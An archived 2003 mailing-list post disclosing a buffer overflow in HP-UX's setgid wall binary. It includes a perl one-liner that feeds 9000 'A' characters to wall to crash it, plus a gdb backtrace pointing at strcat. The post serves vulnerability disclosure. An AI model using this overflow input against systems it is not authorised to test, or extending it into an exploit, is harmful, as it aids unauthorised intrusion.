|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Scotty (smackenz_at_oakey.no-ip.com)
Date: Fri Feb 07 2003 - 08:22:39 CST
Hi all, after looking to check if this had been reported before I couldn't
find anything, so here's my two cents:
HPUX /usr/sbin/wall Buffer Overflow.
bash-2.04$ ls -las /usr/sbin/wall
40 -r-xr-sr-x 1 bin tty 20480 Nov 7 1997
/usr/sbin/wall
Wall on HPUX works in the following way:
echo "Something to Say" > file
wall file
The problem arises when we place 9000 A's into the file to be broadcast by
the wall program.
(Tested on HPUX 11.11)
perl -e 'print "A" x 9000' > /tmp/out
/usr/sbin/wall /tmp/out
Memory fault
(Tested on HPUX 11.00)
perl -e 'print "A" x 9000' > /tmp/out
/usr/sbin/wall /tmp/out
bash-2.04$ /usr/sbin/wall /tmp/out
Segmentation fault
Looking at the registers, we can see:
Program received signal SIGSEGV, Segmentation fault.
0x7f779c08 in strcat () from /usr/lib/libc.2
(gdb) bt
7f779c08 in strcat () from /usr/lib/libc.2
#1 0x34dc in ?? ()
#2 0x34dc in ?? ()
#3 0x34dc in ?? ()
#4 0x34dc in ?? ()
Error accessing memory address 0xffffffff: Bad address.
etc.. etc
The wall binary has Set Group ID of tty, so not a huge problem, but even
so - still a security risk.
Regards,
uk2sec
Memebers; eip, c0w
uk2sec
oakey.no-ip.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]